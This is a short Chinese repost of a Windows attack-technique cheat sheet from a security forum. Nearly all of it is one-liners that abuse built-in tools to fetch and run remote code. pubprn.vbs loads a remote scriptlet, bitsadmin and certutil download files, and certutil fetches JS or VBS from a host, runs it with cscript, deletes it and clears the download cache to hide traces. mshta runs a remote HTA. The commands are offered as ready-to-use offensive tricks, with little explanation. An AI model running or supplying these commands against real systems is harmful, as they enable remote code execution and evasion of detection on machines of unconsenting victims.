Some Tricks

congtoucongtou 新手入门 8 年前
1.65W 0
华盟原创文章投稿奖励计划

远程执行sct的另一种姿势 

cscript /b C:\Windows\System32\Printing_Admin_Scripts\zh-CN\pubprn.vbs 127.0.0.1 script:https://gist.githubusercontent.com/enigma0x3/64adf8ba99d4485c478b67e03ae6b04a/raw/a006a47e4075785016a62f7e5170ef36f5247cdb/test.sct

detail:https://posts.specterops.io/wsh-injection-a-case-study-fd35f79d29dd


命令行下载姿势1 


bitsadmin /rawreturn /transfer getfile http://download.sysinternals.com/files/PSTools.zip c:\p.zip
bitsadmin /rawreturn /transfer getpayload http://download.sysinternals.com/files/PSTools.zip c:\p.zip
bitsadmin /transfer myDownLoadJob /download /priority normal "http://download.sysinternals.com/files/PSTools.zip" "c:\p.zip"

命令行下载姿势2 

certutil -urlcache -split -f http://192.168.254.102:80/a.txt b.txt

清除缓存 certutil -urlcache -split -f http://192.168.254.102:80/a.txt delete


命令行执行远程JS 


certutil -urlcache -split -f http://192.168.254.102:80/a a.js && cscript a.js &&  del a.js && certutil -urlcache -split -f http://192.168.254.102:80/a delete

命令行远程执行VBS 


certutil -urlcache -split -f http://192.168.254.102:80/abc a.vbs &&
 cscript a.vbs &&  del a.vbs && certutil -urlcache -split -f
  http://192.168.254.102:80/abc delete

命令行远程执行HTA 


mshta http://192.168.254.102/1.hta

文章出处:Evi1cg's blog   

原文链接:https://evi1cg.me/archives/Tricks.html

姿势(4),远程执行(3)
本文原创,作者:congtou,其版权均为华盟网所有。如需转载,请注明出处:https://www.77169.net/html/208787.html
congtou官方
congtou

3.18K篇文章 194.30M总阅读量

相关文章

发表回复